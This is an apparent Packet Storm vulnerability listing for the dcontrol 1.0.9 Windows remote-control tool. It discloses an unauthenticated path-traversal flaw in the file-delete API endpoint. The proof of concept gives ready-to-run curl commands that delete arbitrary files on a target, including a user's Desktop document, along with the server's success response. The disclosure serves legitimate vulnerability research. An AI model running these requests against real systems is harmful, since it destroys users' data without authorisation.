PACKETSTORM

📄 dcontrol 1.0.9 Arbitrary File Delete_PACKETSTORM:219223

Description

dcontrol version 1.0.9 suffers from an unauthenticated arbitrary file deletion vulnerability via path traversal in the /control-api/file/delete endpoint...
Visit Original Source

Basic Information

ID PACKETSTORM:219223
Published Apr 20, 2026 at 00:00

Affected Product

Affected Versions # Exploit Title: dcontrol v1.0.9 - Unauthenticated Arbitrary File Delete
# Date: 2026-04-18
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/dhjz/dcontrol
# Software Link:
https://github.com/dhjz/dcontrol/releases/download/1.0.9/dcontrol.exe
# Version: 1.0.9
# Tested on: Windows 10, Windows 11


# Description:
dcontrol v1.0.9 is vulnerable to unauthenticated arbitrary file deletion via
path traversal in the /control-api/file/delete endpoint. The application
fails
to properly sanitize the 'name' parameter, allowing an attacker to use
directory
traversal sequences (../) to delete arbitrary files from the target system.


# Proof of Concept:


curl "
http://TARGET_IP:666/control-api/file/delete?name=../../../../../../Windows/Temp/test.txt
"

Response:
{"code":200,"msg":"操作成功","data":"../../../../../../Windows/Temp/test.txt"}


# Additional PoC - Delete User Documents:
curl "
http://TARGET_IP:666/control-api/file/delete?name=../../../../../../users/USERNAME/Desktop/important.docx
"

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.